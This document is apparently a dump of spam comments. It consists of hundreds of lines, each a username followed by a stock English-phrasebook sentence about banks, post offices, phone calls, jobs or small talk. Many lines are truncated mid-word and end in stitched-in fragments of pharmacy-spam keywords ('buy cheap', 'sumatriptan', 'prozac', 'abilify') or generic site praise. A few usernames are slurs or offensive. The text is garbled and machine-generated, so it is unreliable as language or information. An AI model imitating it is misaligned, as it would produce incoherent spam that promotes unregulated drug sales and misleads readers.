Bennett : I live here .
Matthew : I'd like to change some money .
Donnell : I read a lot .
Bobber : I'd like to order some foreign currency .
Merle : I want to make a withdrawal .
Guadalupe : How much will it cost to send this letter to ? buy g .
Aubrey : What's the current interest rate for personal loans? .
Josef : I'm a trainee chea .
Kristofer : Until August can i bu .
Elroy : I don't know what I want to do after university .
Wilber : I'd like to send this parcel to .
Serenity : I'd like to pay this in, please .
Giuseppe : I can't get a dialling tone .
Snoopy : I need to charge up my phone .
Dorsey : Who's calling? .
Lester : The line's engaged .
Friend35 : Is there ? .
Emmett : I love this site .
Aubrey : I saw your advert in the paper .
Merrill : I can't stand football .
Antone : Where are you from? .
Kelvin : I quite like cooking .
Franklyn : I'm happy very good site .
Owen : We need someone with experience .
Andrea : I went to .
Vida : Cool site goodluck :) .
Scottie : Punk not dead .
Brain : Can I call you back? .
Reggie : Can you put it on the scales, please? .
Maximo : magic story very thanks .
Stanley : I was born in Australia but grew up in England .
Collin : Have you got a current driving licence? .
Reuben : Do you know what extension he's on? .
Lester : I've got a full-time job .
Unlove : Canada>Canada .
Porfirio : Can you put it on the scales, please? .
Nathanial : I'm in my first year at university .
Valentin : Very Good Site .
Freddie : Sorry, I'm busy at the moment .
Chance : What's the last date I can post this to to arrive in time f .
Renaldo : Could you please repeat that? .
Ramon : I came here to study .
Julio : Which university are you at? .
Thebest : Looking for work .
Diva : I'm a trainee .
Virgilio : Your cash is being counted .
Gabriel : Pleased to meet you .
Harry : Lost credit card .
Darrel : I'd like to send this to .
Wyatt : Is it convenient to talk at the moment? .
Deandre : I'd like a phonecard, please .
Rudolph : How much will it cost to send this letter to ? .
Jamison : What's your number? .
Dogkill : Could I have , please? .
Erasmo : How many days will it take for the cheque to clear? .
Haywood : I'll send you a text .
Connor : Would you like a receipt? .
Donte : I'm doing a phd in chemistry .
Collin : Incorrect PIN .
Thurman : A financial advisor .
Angelo : On another call order va .
Harland : How do you spell that? b .
Juan : What do you like doing in your spare time? .
Sydney : What university do you go to? .
Donte : What are the hours of work? .
Roberto : I'm on work experience .
Daniel : Children with disabilities .
Mitchell : An envelope .
Lincoln : I sing in a choir .
Darell : I've lost my bank card .
Clifford : Could I borrow your phone, please? .
Barbera : I've just graduated .
Bonser : Did you go to university? .
Winston : I'd like to change some money .
Edmond : I live here .
Jerrell : Your cash is being counted .
Brendan : I'm a housewife .
Miguel : This is your employment contract .
Weldon : Could you tell me the number for ? .
Mariah : I work for a publishers .
Alex : I can't hear you very well .
Amber : Excellent work, Nice Design .
Raphael : I'd like to withdraw $100, please .
Marcelo : We've got a joint account .
Kaitlyn : Will I have to work on Saturdays? .
Rubin : I'd like to send this parcel to .
Odell : Whereabouts are you from? .
Payton : How do you know each other? .
Danielle : Not available at the moment .
Jordan : Good crew it's cool :) .
Rigoberto : I'm on work experience am .
Blaine : I'll send you a text .
Napoleon : I can't get a signal buy .
Nathaniel : I'm afraid that number's ex-directory .
Amia : I have my own business bu .
Keneth : When do you want me to start? .
Dro4er : What are the hours of work? .
Harley : I'm afraid that number's ex-directory .
Efrain : We'll need to take up references .
Bryon : How much notice do you have to give? .
Razer22 : Through friends buy ayg .
Stefan : Where did you go to university? .
Jefferson : I'd like to apply for this job .
Percy : How many days will it take for the cheque to clear? .
Maynard : A staff restaurant .
Antone : I've been cut off .
Edward : A Second Class stamp .
Grant : Could I have , please? .
Emmanuel : Have you got any qualifications? buy b .
Janni : What's the last date I can post this to to arrive in time f .
Fletcher : This site is crazy :) buy .
Edison : I'm interested in .
Getjoy : Nice to meet you buy .
Guadalupe : One moment, please .
Edmundo : What sort of music do you listen to? .
Claude : Best Site good looking .
Bailey : I've got a full-time job .
Hilario : I'm not sure .
Ernesto : Do you play any instruments? .
DE : Are you a student? .
Hunter : This is your employment contract .
Patricia : Who do you work for? .
Patrick : Will I get travelling expenses? .
Lionel : I work with computers .
Alonzo : I've lost my bank card .
Sterling : I was made redundant two months ago .
Sandy : I'd like to pay this in, please .
Jeffrey : I'm not sure .
Lioncool : I'd like to withdraw $100, please .
Domenic : I can't stand football .
Freddie : I'd like to change some money .
Jayson : I wanted to live abroad .
Mickey : Have you got any qualifications? .
Calvin : real beauty page .
Craig : I do some voluntary work .
Faith : How much is a Second Class stamp? .
Elvis : I'd like to open an account .
Landon : How much will it cost to send this letter to ? buy c .
Raymundo : Where's the postbox? .
Micah : How do you spell that? .
Alton : What's the exchange rate for euros? buy cytox .
Howard : We went to university together .
Cornell : I work with computers .
Winston : Who's calling? .
Buddy : Which team do you support? .
Tracey : Please call back later .
Oswaldo : I live here .
Harris : Wonderfull great site .
Mauricio : My battery's about to run out .
Brock : We used to work together .
Gianna : I'm on work experience .
Nathaniel : Have you got any ? .
Joseph : Where's the nearest cash machine? .
Quincy : Best Site Good Work .
Carmen : I can't hear you very well .
Danial : I've been made redundant .
Luther : A few months .
Josue : I've been made redundant .
Maynard : In a meeting .
Simon : A packet of envelopes .
Darwin : An estate agents .
Alden : I'm a member of a gym .
Donovan : Sorry, I ran out of credit .
Dewitt : US dollars .
Carlo : Could I order a new chequebook, please? .
Mauro : What do you study? .
Alexandra : Could I ask who's calling? .
Rosario : Could you tell me the dialing code for ? .
Claud : I've been made redundant .
Percy : No, I'm not particularly sporty .
Wilson : I'd like to take the job .
Irvin : I was born in Australia but grew up in England .
Preston : I can't hear you very well .
Hershel : I'd like to send this letter by .
Aubrey : I hate shopping .
Esteban : We were at school together .
Barbera : Your account's overdrawn .
Adam : I'm not interested in football .
Cristobal : Sorry, I ran out of credit .
Marissa : Sorry, you must have the wrong number is it safe .
Freeman : We need someone with experience .
Everett : Canada>Canada .
Roman : Recorded Delivery .
Myles : Languages .
Andreas : A book of First Class stamps .
Hilario : Directory enquiries .
Brody : Yes, I play the guitar .
Elizabeth : A book of First Class stamps el .
Lonny : We're at university together order .
Eric : Best Site good looking bu .
Thebest : I can't get a signal famc .
Pitfighter : I don't know what I want to do after university .
Timothy : Three years .
Dalton : I'd like to open an account .
Cooper : Can I call you back? .
Barry : What do you do for a living? .
Hipolito : Could I make an appointment to see ? .
Conrad : Have you got any ? .
Mason : Have you got any ? .
Alonso : What do you do for a living? .
Darell : A few months .
Stefan : What are the hours of work? .
Dominic : Looking for a job buy flo .
Felix : An estate agents buy .
Jamison : I'm a partner in .
Ezekiel : Remove card buy cheap flo .
Lynwood : Please call back later .
Thebest : The National Gallery .
Michel : A few months .
Zoey : What are the hours of work? .
Bruce : Could I have a statement, please? .
Claire : A company car .
Marcel : I've been made redundant .
Sanford : My battery's about to run out .
Heriberto : I'm not working at the moment .
Allen : Can I take your number? .
Lillian : I've just started at .
Porfirio : No, I'm not particularly sporty .
Shane : Very funny pictures .
Korey : What do you do? .
Maximo : I live here .
Randolph : We'd like to offer you the job .
Heriberto : I can't stand football .
Claudio : I don't know what I want to do after university .
Porfirio : Lost credit card .
Darin : What do you study? .
Sara : I like watching TV cheap .
Nelson : I don't know what I want to do after university .
Alvin : Can I call you back? .
Paige : I can't get through at the moment .
Emile : Recorded Delivery .
Jeffery : How much will it cost to send this letter to ? .
Jerry : How do you spell that? w .
Fredric : Remove card purchase i .
Renato : I came here to work isop .
Forrest : Do you know each other? sumatriptan .
Rafael : Have you got a telephone directory? buy .
Clifford : I study here buy generic .
Claudio : I work here kemadrin 5m .
Truman : How long are you planning to stay here? .
Liam : Accountant supermarket manager .
Stuart : A financial advisor .
Reuben : Could you transfer $1000 from my current account to my depos .
Antwan : What university do you go to? .
Dannie : I work for myself .
Clement : How much will it cost to send this letter to ? .
Marty : I'd like to send this letter by .
Dewey : I hate shopping .
Jarrod : I live in London .
Haley : perfect design thanks .
Alexa : Where do you study? .
Arron : i'm fine good work .
Damian : I wanted to live abroad .
Wilson : Have you got any experience? .
Dwain : Could I have a statement, please? .
Columbus : i'm fine good work .
Kendall : A staff restaurant .
Hobert : Other amount .
Harrison : Not available at the moment .
Trevor : Do you know what extension he's on? .
Galen : One moment, please .
Nestor : History .
Vaughn : Do you like it here? .
Jamal : Special Delivery .
Destiny : I'm about to run out of credit .
Margarito : I support Manchester United .
Simon : I'd like to send this to .
Alfred : I work here .
Caden : In a meeting .
Jimmi : I can't get a dialling tone .
Cornell : It's a bad line .
Waldo : I'd like some euros .
Keith : Wonderfull great site .
Josiah : I need to charge up my phone .
Stephan : A company car .
Crazyfrog : Best Site Good Work .
Mishel : Can I use your phone? .
Claud : We're at university together .
Zoe : Enter your PIN .
Gregory : How many weeks' holiday a year are there? .
Jordan : Can you put it on the scales, please? buy cheap me .
Grace : Where's the nearest cash machine? .
Giovanni : Have you got any experience? .
Rebecca : I like watching football meclizin .
Norbert : I'd like to tell you about a change of address .
Frederick : What do you like doing in your spare time? .
Kyle : What's the exchange rate for euros? .
Lucien : Another year .
Elisha : Do you know what extension he's on? .
Ian : I enjoy travelling .
Lamont : What qualifications have you got? .
Alexis : I'm about to run out of credit .
Guillermo : What sort of music do you like? .
Pitfighter : I work for myself .
Arlen : Is this a temporary or permanent position? .
Brice : Where's the postbox? or .
Broderick : A First Class stamp pr .
Rachel : The line's engaged .
Franklin : This site is crazy :) .
Raymundo : Will I get travelling expenses? .
Fidel : I'd like some euros .
Curt : I've lost my bank card .
Eli : I'd like to change some money wher .
Ashton : How many are there in a book? nap .
Lonny : Withdraw cash niz .
Weston : I hate shopping buy niz .
Vida : I went to .
Haley : Until August .
Osvaldo : Where do you come from? .
Elisha : Do you play any instruments? .
Antony : I live in London .
Jorge : Hello good day .
Aurelio : What qualifications have you got? .
Austin : In tens, please (ten pound notes) .
Domenic : I'd like to transfer some money to this account .
Sean : Looking for work .
Noah : What's your number? buy .
Rayford : Very Good Site purchase .
Ricky : What part of do you come from? buy p .
Ervin : What's the current interest rate for personal loans? .
Numbers : We'll need to take up references .
Elbert : I support Manchester United .
Antoine : Looking for a job .
Royce : I didn't go to university .
Arnold : I'd like to speak to someone about a mortgage .
Mauro : I'm not working at the moment .
Rebecca : Free medical insurance .
Jeremiah : This is your employment contract .
Thebest : Could I have , please? .
Werner : Where do you come from? .
Buddy : Which team do you support? .
Harland : What do you do? .
Rodger : I work for myself .
Blake : We'd like to offer you the job .
Dorian : I'm a housewife .
Aiden : What's the exchange rate for euros? bu .
Octavio : I saw your advert in the paper .
Douglass : How would you like the money? .
Angel : Could you send me an application form? .
Danial : I've just graduated buy m .
Jerry : Through friends .
Colby : Where do you come from? .
Wilson : I live here purchase requ .
Lucien : I'm not interested in football .
Porfirio : Get a job order sereven .
Elijah : Very interesting tale d .
Winfred : I like watching TV .
Charlotte : I enjoy travelling .
Cedrick : Have you got a telephone directory? buy .
Maria : How much notice do you have to give? .
Emery : I want to make a withdrawal .
Katelyn : I'd like , please .
Haywood : I saw your advert in the paper .
Randolph : I'll text you later .
Elvis : I'd like to take the job .
Fredric : Is it convenient to talk at the moment? .
Victoria : In tens, please (ten pound notes) .
Normand : Could I borrow your phone, please? .
Alphonse : The manager .
Joshua : Incorrect PIN .
Tanner : What qualifications have you got? .
Willard : Can I take your number? .
Cornelius : An estate agents .
Alexander : I'd like to order some foreign currency .
Scott : Sorry, I'm busy at the moment .
Carey : Children with disabilities .
Walter : We work together .
Juan : How long have you lived here? .
Isabel : We'll need to take up references .
Duncan : How many days will it take for the cheque to clear? .
Richie : It's serious .
Dewayne : Through friends .
Corey : I wanted to live abroad .
Colton : I'm a housewife .
Roger : I was made redundant two months ago .
Gaylord : I'll put her on .
Antone : It's OK .
Jesse : I'm interested in .
Sherman : Who's calling? .
Randal : I was born in Australia but grew up in England .
Gregg : I've come to collect a parcel .
Odell : Have you got a telephone directory? .
Jamison : I work for a publishers .
Lindsay : I'd like to pay this cheque in, please .
Kareem : Could I borrow your phone, please? .
Genesis : A law firm .
Douglas : Do you know the address? .
Whitney : Other amount .
Clint : i'm fine good work .
Zachariah : Can I take your number? .
Dorian : Enter your PIN tinida .
Reynaldo : Can I call you back? .
Cooler111 : Do you know the address? .
Rosario : Thanks funny site o .
Perry : I like watching TV .
Tyrell : Until August .
Brady : I'd like to open a business account .
David : Special Delivery .
Elijah : I'd like to send this letter by .
Kieth : What do you do? .
Mike : An estate agents .
Sherwood : I was born in Australia but grew up in England .
Cody : Special Delivery .
Hector : I'd like , please .
Faustino : International directory enquiries or .
Deandre : How many days will it take for the cheque to clear? .
Quincy : Please call back later buy .
Delbert : Could you transfer $1000 from my current account to my depos .
Jozef : I'd like to open a business account .
Chris : What university do you go to? .
Dwayne : I'm self-employed .
Everette : I'm sorry, I didn't catch your name .
Kelly : Withdraw cash .
Stephanie : I like watching football .
Octavio : good material thanks .
Truman : Do you know what extension he's on? .
Mervin : I've just graduated .
Carmine : This is the job description .
Bob : We need someone with qualifications .
Bradley : Have you got a current driving licence? .
Mya : Best Site Good Work .
Osvaldo : Is it convenient to talk at the moment? .
Lauren : What sort of music do you like? .
Goodboy : I'd like some euros .
Morton : Can you put it on the scales, please? .
Trevor : I do some voluntary work .
Payton : Incorrect PIN .
Sara : real beauty page .
Clifton : Three years .
Gavin : I work for myself .
Quinton : I'm a trainee purc .
Eduardo : What qualifications have you got? .
Emmitt : What do you study? order e .
Sherman : A packet of envelopes .
Millard : good material thanks .
Chloe : Not available at the moment .
Rodrick : I've been cut off .
Vaughn : I'd like to take the job .
Wesley : A few months .
Travis : How many more years do you have to go? .
Eblanned : Will I have to work on Saturdays? .
Donovan : I'm training to be an engineer .
Stanley : I'd like to open a business account .
Esteban : I'd like to tell you about a change of address .
Hassan : I'm self-employed .
Coleman : I do some voluntary work .
Theron : What do you study? .
Quintin : I'd like a phonecard, please .
Lamar : I work for myself buy am .
Carlo : I live here a d .
Lavern : Canada>Canada wher .
Ezequiel : Whereabouts in are you from? .
Tracey : This is the job description .
Joaquin : How long are you planning to stay here? buy ata .
Emilio : What's the current interest rate for personal loans? .
Darren : I'm about to run out of credit .
Ruben : It's a bad line .
Sarah : I'm doing a phd in chemistry buy cheap c .
Katherine : Lost credit card .
Hubert : Could I ask who's calling? .
Merrill : very best job .
Mathew : Until August .
Crazyfrog : Could you transfer $1000 from my current account to my depos .
Benjamin : Will I have to work on Saturdays? .
Federico : Recorded Delivery whe .
Kerry : Could I have a statement, please? .
Nathan : Cool site goodluck :) .
Philip : Thanks for calling .
Clinton : Until August .
Rudolf : We'd like to invite you for an interview .
Thomas : I'd like to tell you about a change of address .
Theron : Not in at the moment .
Quintin : Best Site good looking .
Gayle : Where's the postbox? .
Bruce : Where's the nearest cash machine? .
Dewey : A company car .
Audrey : I'm training to be an engineer .
Genesis : How many are there in a book? .
Emily : Best Site Good Work .
Ronald : When can you start? .
Jewell : Will I get travelling expenses? .
Dexter : I really like swimming .
Trinidad : Can you hear me OK? .
Julius : Can you hear me OK? .
Kieth : I'd like to open an account .
Jordon : I'd like to send this parcel to .
Reyes : How do you spell that? .
Faustino : A company car .
Jonathan : This is your employment contract .
Neville : Best Site Good Work .
Russel : What do you like doing in your spare time? .
Cyrus : How do you spell that? ch .
Vicente : Excellent work, Nice Design b .
Jerry : Do you have any exams coming up? .
Ella : I'm from England buy p .
Ian : What sort of work do you do? .
Arianna : Could you ask her to call me? .
Leonard : I'd like to open an account .
Arturo : Your cash is being counted bu .
Noah : I sing in a choir can buy zo .
Ernest : I quite like cooking .
Mia : Not available at the moment .
Hilton : I'm afraid that number's ex-directory .
Jeramy : Would you like to leave a message? .
Sidney : I'd like to pay this in, please .
Darrin : A few months order albendaz .
Wilbert : Have you read any good books lately? ada .
Mackenzie : I came here to work cheapes .
Luis : I need to charge up my phone .
Mathew : Will I have to work on Saturdays? .
Getjoy : Have you got any ? .
Spencer : It's OK .
Clayton : Where did you go to university? .
Teddy : I'd like to cancel a cheque .
Daron : Please wait .
Fletcher : On another call .
Lyman : Could you ask her to call me? .
Erick : I'd like to change some money .
Levi : Enter your PIN .
Hipolito : I work for a publishers .
Marcelo : What's the interest rate on this account? .
Lawerence : Children with disabilities .
Pablo : It's a bad line .
Vicente : It's funny goodluck .
Herschel : Please call back later .
Elisha : Have you got any qualifications? .
Lester : I'm sorry, I didn't catch your name .
Rickie : I'd like to cancel this standing order .
Rupert : Could I have a statement, please? buy .
Dannie : magic story very thanks .
Vicente : I quite like cooking .
Carlo : I'd like to change some money .
Roman : Can you put it on the scales, please? .
Douglass : Accountant supermarket manager .
Anna : I wanted to live abroad .
Haley : I really like swimming .
Morgan : How much notice do you have to give? .
Billie : A First Class stamp .
Jasper : Good crew it's cool :) .
Nathanial : I'm at Liverpool University .
Jada : A few months .
Darryl : My battery's about to run out .
Houston : I'm sorry, she's .
Tyson : Yes, I play the guitar .
Geoffrey : I've got a very weak signal .
Lawrence : perfect design thanks .
Major : Another year .
Earle : I'm self-employed .
Adolph : What's the last date I can post this to to arrive in time f .
James : Whereabouts are you from? .
Donnie : Could I have a statement, please? .
Brice : I'm a housewife .
Everette : The United States .
Jose : Canada>Canada .
Diva : I'm unemployed .
Vincent : I like watching TV .
Sandy : Could you please repeat that? .
Genaro : Do you know the number for ? .
Cristopher : Do you like it here? .
Emma : What's the current interest rate for personal loans? .
Johnny : Best Site good looking .
Darnell : Do you know the address? .
Chester : A few months .
Donovan : I live in London .
Flyman : It's serious .
Darrick : I'd like a phonecard, please .
Elias : I'm self-employed .
Wyatt : I'm interested in .
Solomon : I'm not working at the moment .
Teodoro : Good crew it's cool :) .
Rusty : Thanks for calling .
Randy : How much is a Second Class stamp? .
Edgar : How much is a First Class stamp? .
Darell : How do you do? .
Marvin : How much is a First Class stamp? .
Darren : Withdraw cash .
Arnold : Excellent work, Nice Design .
Isaiah : The line's engaged .
Sebastian : I've lost my bank card .
Walker : How much is a First Class stamp? .
Pierre : How long are you planning to stay here? .
Lance : Could you tell me my balance, please? .
Leonard : How much will it cost to send this letter to ? .
Infest : I'm not working at the moment .
Mya : I'm sorry, I didn't catch your name .
Thurman : I'm a partner in .
Rodney : What do you like doing in your spare time? .
Gaylord : I saw your advert in the paper .
Douglas : I'd like to speak to someone about a mortgage .
Snoopy : I'd like to send this parcel to .
Allison : I work here .
Ezequiel : I'm doing a masters in law .
Arron : Yes, I play the guitar .
Pitfighter : This site is crazy :) .
Freelove : Will I have to work on Saturdays? .
Fredrick : Free medical insurance .
Casey : Withdraw cash .
Kristofer : Where's the nearest cash machine? .
Armando : An envelope .
Wilfred : I'd like to open a business account .
Shawn : On another call .
Colton : I'd like to order some foreign currency .
Jeramy : An estate agents .
Tyron : It's OK lev .
Osvaldo : The line's engaged .
Darryl : I went to .
Danilo : I can't get through at the moment .
Houston : I'm on work experience .
Aiden : How do you do? .
Trinity : US dollars .
Fidel : Have you got any experience? .
Nicole : One moment, please .
Jose : I'll put her on .
Roosevelt : Where's the nearest cash machine? .
Jocelyn : Very funny pictures .
Christoper : Cool site goodluck :) .
Emanuel : I'm from England .
Julia : I work here .
Cole : How long are you planning to stay here? .
Efren : International directory enquiries .
Aiden : This is the job description .
Sylvester : Could I have a statement, please? .
Alejandro : A First Class stamp .
Jennifer : Remove card .
Boyce : I work for myself .
Irea : Accountant supermarket manager .
Lawrence : I have my own business .
Mickey : How long have you lived here? .
Gerard : Not available at the moment .
Matthew : Would you like to leave a message? .
Connie : I'm a member of a gym .
Raleigh : Lost credit card .
Bryon : Incorrect PIN .
Ulysses : The line's engaged .
Isabel : Who would I report to? .
Madeline : I'd like to tell you about a change of address .
Haley : good material thanks .
Aiden : Recorded Delivery .
Geraldo : I'm doing a masters in law .
Kurtis : A packet of envelopes .
Jesus : I'm originally from Dublin but now live in Edinburgh .
Raymon : Your account's overdrawn .
Vincent : Where do you study? .
Junior : I'll call back later .
Collin : Can I take your number? .
Taylor : What line of work are you in? .
Ronald : Are you a student? .
Delmer : Can I call you back? .
Cameron : I never went to university .
Palmer : Nice to meet you .
Alonzo : I've been made redundant .
Jonathon : I work for myself .
Stuart : Where are you calling from? .
Billy : I work with computers .
Clint : I went to .
Kristopher : I'd like to open a business account .
Lyman : I never went to university .
Rickie : I'm on work experience .
Kenneth : Sorry, you must have the wrong number .
Avery : Where do you live? .
Chuck : How do you spell that? .
Tilburg : I don't like pubs .
Cecil : Where do you come from? .
Jackson : I'd like a phonecard, please .
Collin : Withdraw cash .
Kurtis : I'm a partner in .
Freddy : I'd like to open a personal account .
Brain : Is it convenient to talk at the moment? .
Christian : I've been cut off .
Damian : Yes, I play the guitar .
Zoey : A company car .
Hyman : I work for a publishers .
Irea : I'm from England .
Eliseo : I'd like to cancel this standing order .
Ricardo : Your account's overdrawn .
Wendell : Will I have to work on Saturdays? .
Getjoy : Your cash is being counted .
Rubin : Do you have any exams coming up? .
Olivia : A packet of envelopes .
Jermaine : Will I get travelling expenses? .
Aaron : I've got a full-time job .
Theodore : Lost credit card .
Everett : Can I use your phone? .
Henry : I like watching TV .
Thurman : What's the last date I can post this to to arrive in time f .
Cecil : Your account's overdrawn .
Jamaal : The manager .
Jordon : I'd like a phonecard, please .
Jonah : History .
Addison : What sort of work do you do? .
Jeramy : I work for a publishers .
Cristobal : I've only just arrived .
Deangelo : I'd like to apply for this job .
Henry : How do I get an outside line? .
Harlan : Three years .
Linwood : We've got a joint account .
Forrest : I'd like to take the job .
Dorian : Have you got any experience? .
Harlan : Where's the postbox? .
Gerald : I'm not sure .
Delmer : I'd like to order some foreign currency .
Eldridge : I'm self-employed .
Ezequiel : Jonny was here .
Cyrus : I've been made redundant .
Pablo : I'd like to tell you about a change of address .
Brice : I have my own business .
Millard : Lost credit card .
Kaden : I can't stand football .
Andrew : What's the current interest rate for personal loans? .
Rayford : How many days will it take for the cheque to clear? .
Manual : I'd like to cancel a cheque .
Normand : Incorrect PIN .
Ernesto : I saw your advert in the paper .
Marcelino : I'd like to tell you about a change of address .
Chang : Thanks funny site .
Lamont : I can't get through at the moment .
Rudolph : Good crew it's cool :) .
Clayton : On another call .
Reuben : I work for myself .
Reyes : Why did you come to ? .
Geoffrey : I'd like some euros .
Andrea : A Second Class stamp .
Riley : US dollars .
Wyatt : We used to work together .
Nogood87 : Yes, I play the guitar .
Hannah : Could I have , please? .
Seymour : I'm retired .
Jamison : We're at university together .
Genesis : I'm sorry, I didn't catch your name .
Galen : Some First Class stamps .
Elvis : I'd like to change some money .
Colby : Hold the line, please .
Fletcher : Please wait .
Carson : We're at university together .
Chloe : No, I'm not particularly sporty .
Anton : Photography .
Lindsay : Pleased to meet you .
Incomeppc : I'm sorry, she's .
Lenard : I enjoy travelling .
Darwin : Could I make an appointment to see ? .
Johnathan : In a meeting .
Orlando : I'm sorry, she's v .
Colby : Where did you go to university? .
Kidrock : I was made redundant two months ago .
Winston : Sorry, you must have the wrong number .
Boyce : Thanks for calling .
Franklin : I like watching TV .
Patrick : Hold the line, please .
Andre : A book of First Class stamps .
Gilbert : Cool site goodluck :) .
Fritz : How do you do? .
Crazyivan : What line of work are you in? .
Juan : I can't stand football .
Lindsay : Have you got a telephone directory? .
Alonzo : Have you seen any good films recently? .
Jules : Other amount .
George : this post is fantastic .
Lester : On another call .
Colby : Which university are you at? .
Jerald : When can you start? .
Harold : I enjoy travelling .
Norberto : An accountancy practice .
Alfredo : I'm sorry, he's .
Malcolm : How much is a Second Class stamp? .
Waldo : I've got a full-time job .
Bennett : How do you do? .
Paris : I'd like to order some foreign currency .
Alonzo : Pleased to meet you .
Heyjew : Could I have a statement, please? .
Harvey : Withdraw cash .
Leonel : I'm not working at the moment .
Brant : What university do you go to? .
Wayne : How would you like the money? .
Alonzo : real beauty page .
Guadalupe : good material thanks .
Christophe : I hate shopping .
Steve : I'm training to be an engineer .
Gregorio : I'd like , please .
Wilford : I can't get through at the moment .
Dominique : Where's the postbox? .
Jasmine : I'm originally from Dublin but now live in Edinburgh .
Abram : Gloomy tales .
Henry : US dollars .
Gregory : How much notice do you have to give? .
Stevie : Get a job .
Galen : This site is crazy :) .
Napoleon : Where's the nearest cash machine? .
Genaro : Who would I report to? .
Conrad : I'd like to pay this in, please .
Rodrigo : I enjoy travelling .
Shelton : Could I order a new chequebook, please? .
Kenton : I want to report a .
Merrill : Why did you come to ? .
Prince : Could I take your name and number, please? .
Major : An accountancy practice .
Erick : I'd like to send this letter by .
Antony : Do you have any exams coming up? .
Michelle : We went to university together .
Christoper : I'd like to change some money .
Amado : Will I have to work on Saturdays? .
Hubert : this is be cool 8) .
Jack : We'd like to offer you the job .
Rhett : I didn't go to university .
Brayden : I'm not sure .
Jarrod : I can't get a dialling tone .
Chloe : Lost credit card .
Cornelius : I'm doing a masters in law .
Randolph : Do you know each other? .
Timothy : I'm not interested in football .
Hipolito : Do you play any instruments? .
Walker : magic story very thanks .
Ahmad : I'd like to take the job .
Garland : Very funny pictures .
Pitfighter : What do you study? .
Bradford : I can't get through at the moment .
Faith : I'd like to order some foreign currency .
Ramiro : I work here .
Jospeh : I'd like to open a personal account .
Jayson : Do you know the address? .
Matthew : I've got a full-time job .
Kieth : I'm in my first year at university .
Dewitt : I hate shopping .
Alexander : I'm sorry, he's .
Bennett : Just over two years .
Nevaeh : Could I have a statement, please? .
Douglas : I'd like to tell you about a change of address .
Autumn : Could you transfer $1000 from my current account to my depos .
Orval : Where do you study? .
Micheal : How much were you paid in your last job? .
Arron : I'd like to cancel this standing order .
Harlan : I'm doing an internship .
Kenton : Have you got any ? .
Irving : Wonderfull great site .
Cedric : I'm interested in .
Timmy : We went to university together .
Mario : Do you know the address? .
Arthur : What sort of work do you do? .
Deshawn : My battery's about to run out .
Eusebio : I'd like to transfer some money to this account .
Donny : How much is a Second Class stamp? abilify o .
Camila : Where did you go to university? ch .
Sofia : perfect design thanks .
Norris : I've got a part-time job .
Wayne : magic story very thanks .
Nicole : Do you need a work permit? .
Robby : I'd like to send this letter by .
Leonard : Which year are you in? .
Arianna : Yes, I love it! .
Wilfred : Your cash is being counted .
Thanh : It's funny goodluck z .
Korey : An accountancy practice .
Amber : I don't know what I want to do after university .
Emanuel : Not available at the moment .
Julia : Just over two years .
Shaun : I'll text you later purc .
Wilson : Lost credit card .
Shayne : I'm sorry, he's cheap p .
Weston : I'm unemployed prozac pu .
Homer : Could I make an appointment to see ? .
Alonzo : I'd like , please c .
Kirby : Enter your PIN .
William : Do you have any exams coming up? .
Lawrence : Three years buy cozaa .
Tommy : Is it convenient to talk at the moment? where .
Jefferson : I'm afraid that number's ex-directory .
Diego : I love the theatre .
Lillian : How many weeks' holiday a year are there? .
Colton : Another service? .
Marlon : Do you play any instruments? .
Delmer : We've got a joint account .
Gavin : The National Gallery .
Alfonzo : How many would you like? .
Cornelius : It's serious .
Lloyd : What do you do? .
Shelton : I'm doing an internship .
German : I'm a partner in .
Rickie : Very funny pictures .
Winfred : What university do you go to? .
Mariah : Best Site Good Work .
Emanuel : When can you start? .
Jerald : How much is a Second Class stamp? .
Chauncey : It's OK .
Tyrell : Sorry, I'm busy at the moment .
Santos : Will I get paid for overtime? .
Glenn : About a year .
Crazyfrog : We'll need to take up references .
Boyce : Please call back later .
Crazyivan : A First Class stamp .
Antone : Pleased to meet you .
Jeffrey : I've got a very weak signal .
Robbie : I'd like some euros .
Lavern : Would you like to leave a message? .
Tyrone : I enjoy travelling .
Garry : I wanted to live abroad .
Britt : What line of work are you in? .
Dwayne : About a year .
Tracey : Could I make an appointment to see ? .
Quinn : I can't hear you very well .
Theodore : What's the exchange rate for euros? .
Rosendo : I'd like to tell you about a change of address .
Arnulfo : I'm interested in .
Denver : Thanks for calling .
Hershel : I hate shopping .
Augustine : I came here to study .
Hilario : Who would I report to? .
Collin : Have you seen any good films recently? .
Titus : Do you play any instruments? .
Kevin : Could you transfer $1000 from my current account to my depos .
Rusty : I'm not interested in football .
Tyson : Insufficient funds .
Jamison : Which university are you at? .
Mohamed : Could I have a statement, please? .
Merle : I'd like to withdraw $100, please .
Philip : Which year are you in? .
Ariel : Why did you come to ? .
Patricia : Will I have to work shifts? .
Mia : An accountancy practice .
Friend35 : Could you please repeat that? .
Sandy : What sort of work do you do? .
Jerry : I'd like to change some money .
Dro4er : Where are you from? .
Darnell : I'd like to cancel a cheque .
Nathan : Best Site good looking .
Marcelino : Do you know the address? .
Mishel : What sort of music do you listen to? .
Harlan : How many would you like? .
Blair : Why did you come to ? .
Harold : What company are you calling from? .
Maynard : I've got a very weak signal .
Cortez : Excellent work, Nice Design .
Freelove : Get a job .
Ariana : Do you play any instruments? .
Landon : We've got a joint account .
Dirtbill : In a meeting .
Bryant : Languages .
Brendon : I'd like to apply for this job .
Khloe : How much does the job pay? .
Howard : I'm sorry, I'm not interested .
Barbera : I'm retired .
Bennett : Until August .
Edwin : What company are you calling from? .
Dwight : I'd like to cancel this standing order .
Carmen : We're at university together .
Zachary : How do I get an outside line? .
Gabrielle : Canada>Canada .
Luciano : An accountancy practice .
Kurtis : What's the interest rate on this account? .
Ricardo : A pension scheme .
Francesco : What do you want to do when you've finished? .
Jordon : What qualifications have you got? .
Enrique : I'd like to open a personal account .
Isabel : Looking for a job .
Dillon : Do you know the number for ? .
Giuseppe : I can't hear you very well .
Kevin : How long are you planning to stay here? .
Malcolm : Could you ask him to call me? .
Alfonzo : I've only just arrived .
Erin : What sort of music do you like? .
Ivory : How many are there in a book? .
Emmitt : Could I order a new chequebook, please? .
Pablo : I can't stand football .
Mohamed : Lost credit card .
Jacob : perfect design thanks .
Gabrielle : Could you transfer $1000 from my current account to my depos .
Douglass : I'd like to tell you about a change of address .
Jacinto : I'd like to withdraw $100, please .
Buddy : What do you study? .
Lucky : I'm a partner in .
Levi : I can't get a dialling tone .
Edison : Will I be paid weekly or monthly? .
Russell : A First Class stamp .
Walter : A few months .
Blaine : How much does the job pay? .
Gerard : How do you do? .
Enoch : Could you tell me the number for ? .
Cody : Where are you calling from? .
Colby : Your account's overdrawn .
Osvaldo : Do you know what extension he's on? .
